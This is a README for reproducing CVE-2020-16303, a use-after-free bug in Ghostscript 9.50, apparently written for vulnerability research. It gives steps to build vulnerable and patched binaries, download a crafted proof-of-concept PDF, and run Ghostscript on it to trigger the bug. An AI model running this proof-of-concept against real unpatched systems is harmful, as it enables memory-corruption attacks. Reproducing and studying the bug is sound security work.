CVE-2020-16303 use-after-free vulnerability in Artifex Software GhostScript v9.50

README.md

Setup Instructions

• Download GhostScript GhostPDL v9.50 from their GitHub release.
  • Need to download both the official build and the source code.
  • Official build (without fix): wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs950/ghostscript-9.50-linux-x86_64.tgz.
  • Official build (with fix): wget https://github.com/ArtifexSoftware/ghostpdl-downloads/releases/download/gs951/ghostscript-9.51-linux-x86_64.tgz.
• Compile from source code in the following steps:
  • Get the source code git clone git@github.com:ArtifexSoftware/ghostpdl.git.
  • Change to the correct version git checkout b5bc53eb7.
  • Make sure you have installed gcc, make and autoconf.
    • sudo apt install gcc
    • sudo apt install make
    • sudo apt install autoconf
  • Run ./autogen.sh.
  • Run make sanitize.
  • The build target would be in sanbin folder.
• Download the crafted input file poc.pdf from this page.
  • Run wget https://gist.githubusercontent.com/yunpengn/2a997a30ea798c2a2f1ac2fc89d31106/raw/0296f78472ab6da2f296ab7a0584e47cebd08d74/poc.pdf.
• Run the command to simulate the vulnerability:
  • ./gs -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
  • ./gs-debug -dBATCH -dDEBUG -dNOPAUSE -dSAFER -dNOTRANSPARENCY -dPDFSTOPONERROR -sOutputFile=tmp -sDEVICE=xpswrite ./poc.pdf
  • ./gs-san -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-san -sDEVICE=xpswrite ./poc.pdf
  • ./gs-fix -dBATCH -dNOPAUSE -dSAFER -dNOTRANSPARENCY -sOutputFile=tmp-fix -sDEVICE=xpswrite ./poc.pdf

References

• https://nvd.nist.gov/vuln/detail/CVE-2020-16303
• Exploit: https://bugs.ghostscript.com/show_bug.cgi?id=701818
• Patch: https://github.com/ArtifexSoftware/ghostpdl/commit/94d8955cb77
• Quick start: https://www.ghostscript.com/doc/9.50/Use.htm

poc.pdf